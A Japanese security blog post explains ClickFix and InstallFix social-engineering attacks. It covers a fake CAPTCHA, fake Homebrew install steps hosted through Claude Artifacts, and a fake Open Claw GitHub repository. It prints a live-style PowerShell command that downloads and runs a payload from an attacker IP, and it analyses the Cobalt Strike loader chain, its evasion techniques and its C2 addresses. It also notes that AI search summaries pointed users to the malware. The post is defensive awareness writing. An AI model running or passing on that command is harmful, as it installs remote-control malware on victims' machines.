「自分でマルウェアをインストールしてしまう時代」(InstallFixのお話)
はじめに
近年高度化してきている、ソーシャルエンジニアリングの手法について2つほど紹介します。
普段からセキュリティに触れている身ではありますが、いつか引っかかるかもしれないと思うほどで、これまで以上に気を引き締めないといけないと感じております。。
今回紹介するのはどちらもWindowsやmacOSに応用が利くような手法のため、『Windowsだから』、『macOSだから』という話ではない。。かもしれません。
1つ目の記事はClaudeの機能を悪用した手法で、2つ目は今話題になっているOpen Clawに関する手法となります。
どちらもInstallFixと呼ばれる手法となっています。
事前知識
今回のお話では「ClickFix」というソーシャルエンジニアリング手法の亜種が紹介されているので、ClickFixが何か分からない方のために解説しておきます。
ご存じの方は「記事1」までスキップしていただいて大丈夫です。
ClickFixとは
ClickFixは近年、攻撃者によって活発に利用されているソーシャルエンジニアリング手法です。
2024年の3月頃から観測され始めたそうです。(Claudeに生成させたレポート)
最も有名で一般的に知られている手法は、
「Botではないことを判断する仕組み(CAPTCHAなど)に見せかけて、不審なコードをユーザに実行させる」といったものです。
最近は様々なClickFixの亜種が存在しますが、根本としては不審なコマンドをユーザに実行させる手法だと認識してます。
今回は亜種であるInstallFixに着目した記事を紹介してます。
具体例
まずは、デフォルトのClickFixの一例をご紹介します。
(※執筆時点でThreat Foxに上がっていたものを適当にピックアップして調査してます。)
サイトにアクセスすると突然、以下のような画面が表示されます。
一見、人間であることを証明するための画面に見えます。
「I'm not a robot」のチェックボックスを押すと、以下の画面に切り替わります。
攻撃者は以下を案内してます。
- [Windowsキー]と[R]を同時に押して、「ファイル名を指定して実行」の画面を開く
- [Ctrl]と[V]を同時に押して、クリップボードの文字列を張り付け
- [Enter]を押して、コマンドを実行
チェックボックスをクリックした段階でパソコンのクリップボードには以下の不審なPowerShellコマンドがコピーされており、それを実行させるための指示となってます。
powershell -nop -w h -c "Set-Alias -Name x -Value Invoke-Expression;irm 62[.]0x85[.]0x3C[.]0x62/n3/vocals[.]m3u|x"
これは62.133.60[.]98という攻撃者のインフラ(ドイツ)からvocals.m3uという名前のファイルをダウンロードして、実行させるコマンドです。
.m3uは一般的に音楽のプレイリストをテキスト形式で保持するためのファイル拡張子として利用されるため、後からユーザがこのファイルを見つけても不審だと感じさせないための偽装と思われます。
こちらが一般的なClickFixの手法です。
余談: 追加調査
ここからは本筋とはズレる内容なので、「記事1」までスキップしていただいても大丈夫です。
先ほどのClickFixでクリップボードにコピーされるコマンドを改めて見てみます。
powershell -nop -w h -c "Set-Alias -Name x -Value Invoke-Expression;irm 62[.]0x85[.]0x3C[.]0x62/n3/vocals[.]m3u|x"
このコマンドでダウンロードされるvocals.m3uを実際に取得して静的解析・動的解析を行いました。
ファイル概要
| 項目 | 値 |
|---|---|
| ファイル名 | vocals.m3u |
| 実態 | PowerShellスクリプト(3.7MB) |
| VT検出率 | 9/76(Trojan.PowerShell.Cobalt) |
| 最終ペイロード | Cobalt Strike Beacon |
.m3uは本来、音楽プレイリストのファイル形式ですが、中身はPowerShellスクリプトでした。3.7MBのうち大部分はダミーの変数やコメントで埋め尽くされたジャンクコードで、実質的なコードは数十行程度です。
実行チェーン(多段ローダー)
[1] vocals.m3u (PowerShell)
│ 64-bit検出 → 32-bit PowerShellで再起動
│ XOR復号(16-byte key)
↓
[2] CoreHubManager.exe (.NET Assembly)
│ メモリ内でAssembly.Load()ロード(ディスク書き込みなし)
│ AES-256-CBC復号 → シェルコード抽出(357KB)
↓
[3] シェルコード注入・実行
│ NtAllocateVirtualMemory → NtCreateThreadEx(NTDLL直接呼び出し)
↓
[4] Cobalt Strike Beacon
C2サーバーへHTTPS通信開始
ファイルを1つダウンロードさせるだけで、4段階の処理を経てCobalt Strike Beaconが起動します。
主な検出回避テクニック
| テクニック | 解説 |
|---|---|
| .m3u拡張子偽装 | 音楽ファイルに見せかけて不審感を低減 |
| IPアドレスの16進数表記 |
62.0x85.0x3C.0x62 → 実際は62.133.60.98
|
| ジャンクコード | 3.7MBの大半がダミーで解析を妨害 |
| XOR + AES二重暗号化 | 内部ペイロードを二重に暗号化 |
| メモリ内実行 | ディスクに書き出さずメモリ上で.NETアセンブリを実行 |
| NTDLL直接呼び出し | EDRのユーザモードフックを回避 |
| PEヘッダ消去 | メモリダンプからのBeacon検出を困難にする |
動的解析で判明したC2通信先
VMware Sandbox上でマルウェアを実行し、ネットワーク接続を監視した結果、以下のC2通信を確認しました。
| 役割 | IPアドレス | プロトコル |
|---|---|---|
| マルウェア配布 | 62.133.60.98 |
HTTP |
| Beacon C2 | 45.150.34.229 |
HTTPS (443) |
配布サーバーとC2サーバーが分離されたインフラ構成になっていました。
追加調査のまとめ
ClickFixで実行させるコマンドはたった1行ですが、その裏では多段の暗号化・メモリ内実行・EDR回避といった高度な技術が使われていました。最終的にCobalt Strike Beaconが起動し、攻撃者は被害者のPCを遠隔操作できる状態になります。
「ファイル名を指定して実行」にコマンドを貼り付けて実行する、たったそれだけでここまでの攻撃チェーンが動き出すということを知っておくのは重要だと思います。
記事1: Claudeの機能を悪用したマルウェア配布
ClaudeのArtifactsを悪用したInstallFix(ClickFixの亜種)という手法が紹介されています。
一般的には人間であることを証明するためにコマンドを実行させるというものが多いですが、InstallFixではツールをインストールするためにコマンドを実行させるという手口になってます。
攻撃者がしたこと
攻撃者はClaudeに標準で備わっているArtifactsという機能を用いて偽のWebサイトを公開しました。
Artifactsには色々なテンプレートがありますが、今回の手法ではClaudeが作成したコンテンツを外部に公開可能な「文章エディター」を利用したと思われます。(あくまで推測)
この記事で共有していた[Claudeに生成させたレポート](再掲)がまさに「文章エディター」で公開したWebサイトです。
これを悪用してmacOSで利用可能なツールに関する偽のインストール手順を公開していたわけです。
また、検索上位に出てくるようにGoogle広告に登録してヒットさせやすくしていました。
公開されたページのドメイン自体は「claude.ai」で不審なものではないので、通ってしまったのかなと個人的には推測しています。
「偽インストール手順」の作成方法
偽のインストール手順にはmacOSでHomebrewをインストールするためのコマンドが記載されていました。
ただ、実際にはHomebrewをインストールするためのコマンドではなく、攻撃者のインフラからマルウェアをダウンロードして実行するコマンドだったのです。
「文章エディター」ではAIが出力した記事しか公開できず、人手での直接操作はできません。(執筆時点で確認)
では、どのようにしてAIに偽のインストール手順を作成させたのか、実際にアーティファクトを触って検証してみました。
「文章エディター」では、ユーザが入力したプロンプト一発で大まかな完成形となるHTMLを生成してくれるのですが、その後にユーザが部分的な修正依頼を出すことも可能でした。
なので、おそらく攻撃者はClaudeに対して「macOSでbrewをインストールする方法」を書かせた後に、コマンド箇所をユーザが指定した悪意のあるコマンドに置き換えさせたのではないかと推測しています。(あくまで推測)
感染までの流れ
- macOSのユーザが
HomebrewをインストールするためにGoogleでbrew macosと検索 - 攻撃者によって作成・公開された偽サイトがトップに表示される
- ユーザが偽サイトへアクセス
- インストールするために記載された手順どおりにコマンドを実行
- マルウェア感染
対策
対策として以下が考えられます。
- Googleの広告として表示されるサイトにはアクセスしない
- PCでコマンドを打つ前はAIに解説してもらうか、自分で調べて危険なものではないことを確認する
- ソフトインストールやコマンドからの設定変更など、PCに直接影響が出るような操作は公式サイトから情報を確認する
- 公式サイトの情報が少ない場合は、複数の記事で共通するコマンドが紹介されているかで確認する
-
InstallFixという手順があるということを知識として覚えておいて、もしかしたら危ないコマンドかも?とアンテナを張れるようにしておく
関連記事
具体的な手法は少し異なりますが、Windows版でもInstallFixが確認されていたため、共有しておきます。
先ほどはClaudeのArtifactsを利用していたのに対して、こちらはClaudeの公式のドキュメントサイトに偽装した偽サイトを利用していた点が異なります。
ただ、同じようにGoogle広告で検索上位に表示されるように細工されていた点は一致しています。
記事2: Open Clawの偽インストールページからの誘導
今回はOpen Clawをインストールしようとするユーザを騙した事例が紹介されていますが、公式のGitHubリポジトリに偽装したマルウェア入りのリポジトリを公開するという手口のため、どんなツールでも応用されうる可能性があります。
Open ClawはGitHubのリポジトリ上で公開されている今話題のツールです。
「ローカルPC上で動作するオープンソースの自律型AIエージェントで、サードパーティの『スキル』をClawHubマーケットプレイスから追加することでファイル操作やアプリ操作を自動化できるツール」とのこと。
ただ、セキュリティ的な面でも話題となっています。
世間的な評価は以下の2つに分かれている気がします。(あくまで主観)
- 『それで面白そうだから!』と飛びつくユーザ(ファーストペンギン)
- 『面白そうだけど今はまだ..』と様子見しているユーザ
攻撃者がしたこと
攻撃者は公式のOpen Clawリポジトリに見せかけて、マルウェアを紛れ込ませたリポジトリを公開していました。
マルウェア入りのリポジトリは攻撃者がゼロから作成したものではなく、Cloudflareが公開しているMoltworkerに関するファイル群だったようです。(そもそもOpen Clawでもないという..)
そこにマルウェアであるOpenClaw_x64.exeを追加し、READMEにはマルウェアを実行させる手順を記載した上でリポジトリを公開していたそう。
個人的なエピソード
以前、Xでたまたま見かけた面白そうなClaudeのMCPを見つけてインストールしたのですが、実はそれが本家ではなくて、本家の方のアイデアをもとに作成・公開された別のよく分からないリポジトリだったことがありました。
今回の記事を見て、「あれがもしマルウェア入りのリポジトリだったら自分はやられてたな、、」と反省しました。。
感染までの流れ
- Windowsのユーザがブラウザで
openclaw windowsと検索 - AIによる要約でマルウェアが含まれるリポジトリが紹介される
- ユーザはAIの要約から偽のGitHubリポジトリにアクセス
- リポジトリのREADMEの手順に沿って、インストール用のコマンドを実行
- マルウェア感染
対策
- ブラウザの検索結果に表示されるAIの要約は参考程度に留める(正確な情報だとは思わない)
- GitHubからツールをインストールする際はそれが正規のリポジトリなのか確認
- ソフトインストールやコマンドからの設定変更など、PCに直接影響が出るような操作は公式サイトから情報を確認する
- 公式サイトの情報が少ない場合は、複数の記事で共通するコマンドが紹介されているかで確認する
-
InstallFixという手順があるということを知識として覚えておいて、もしかしたら危ないコマンドかも?とアンテナを張れるようにしておく
関連情報
GitHub上でOpen Clawと検索したら、「Open Clawを簡単にインストールできるツール」として公開されていた不審なリポジトリがあったため共有となります。
今回の記事ように公式と偽って公開しているわけではないですが、便利ツールにマルウェアが混入しているパターンです。
sdwadsagw/OpenClawInstaller
- アカウント作成日: 2026-02-11(リポジトリと同日作成)
- Star: 2 / Fork: 0
- 説明文: 「AI assistant for Open Claw」
ZIPの中身
Claw-Installer-Open-2.8-alpha.3.zip の中身は以下の4ファイルでした。
| ファイル | サイズ | 説明 |
|---|---|---|
StartApp.bat |
22 bytes |
start luau.exe asm.txt を実行するだけ |
luau.exe |
- | LuaJIT 2.1.0-beta3(正規バイナリ)、VT検出率 25/76 |
lua51.dll |
- | LuaJIT用DLL、VT検出率 1/75 |
asm.txt |
309,298 bytes | 高度に難読化されたLuaスクリプト |
攻撃チェーン
StartApp.bat
→ luau.exe asm.txt (LuaJITで難読化スクリプトを実行)
→ FFI経由でWindows APIを直接呼び出し
luau.exe自体は正規のLuaJITランタイムであり、いわゆるLOLBin(Living off the Land Binary) として悪用されています。正規ツールを使ってマルウェアを実行することで、セキュリティソフトの検出を回避する手法です。
難読化の特徴
asm.txtは以下の難読化が施されており、静的解析でのIOC抽出は困難でした。
-
制御フロー平坦化:
while true do ... if v == 1234 then ... elseif v == 5678 then ...のようなディスパッチテーブル構造 -
文字列のバイトエンコード: 文字列が
string.char(237, 84, 105, ...)のようなバイト列に変換 -
算術定数の難読化:
1234のような単純な数値が(0x12345678 - 0x12344444)のような演算式に置換 -
FFIによるWindows API呼び出し: LuaのFFI(Foreign Function Interface)を使い、Luaスクリプトから直接
kernel32.dll等のWindows APIを呼び出し可能
判定
ほぼ確実にマルウェア(InfoStealer/Loaderの可能性が高い)と判断しています。根拠は以下の通りです。
- 新規作成アカウントがリポジトリと同日に作成されている
- 正規ツール(LuaJIT)を悪用したLOLBinパターン
- 309KBもの高度に難読化されたスクリプト(正規ツールなら難読化の必要がない)
- VTで25/76の検出率(
trojan.lazy等の汎用名で検出)
まとめ
今回の手法はいずれも「ユーザ自身が外部からマルウェアを呼び込んでしまっている」という点で共通していました。
最近では、サイトに記載されているコードをローカルで張り付けるだけでツールがダウンロードできますみたいな案内を見かけたりしますが、これが一般化されすぎてしまうと、ユーザはよりコマンドを実行しやすい思考に近づいてしまうかもしれません。
【Open Clawのインストール方法】
【Claude Codeのインストール方法】
ユーザを騙してインストールさせるという手法は昔からありますが、その対象がどんどん身近になってきている気がしました。
当たり前のことではありますが、外部から取得したツールを実行する際には正しいファイルなのか、しっかりと確認することが重要です。
攻撃者からすると、マルウェアに感染させるには『コンピュータを騙すよりも、人間を騙して人間に実行してもらうのが楽』という共通認識が既にできているのかもしれません。。
Discussion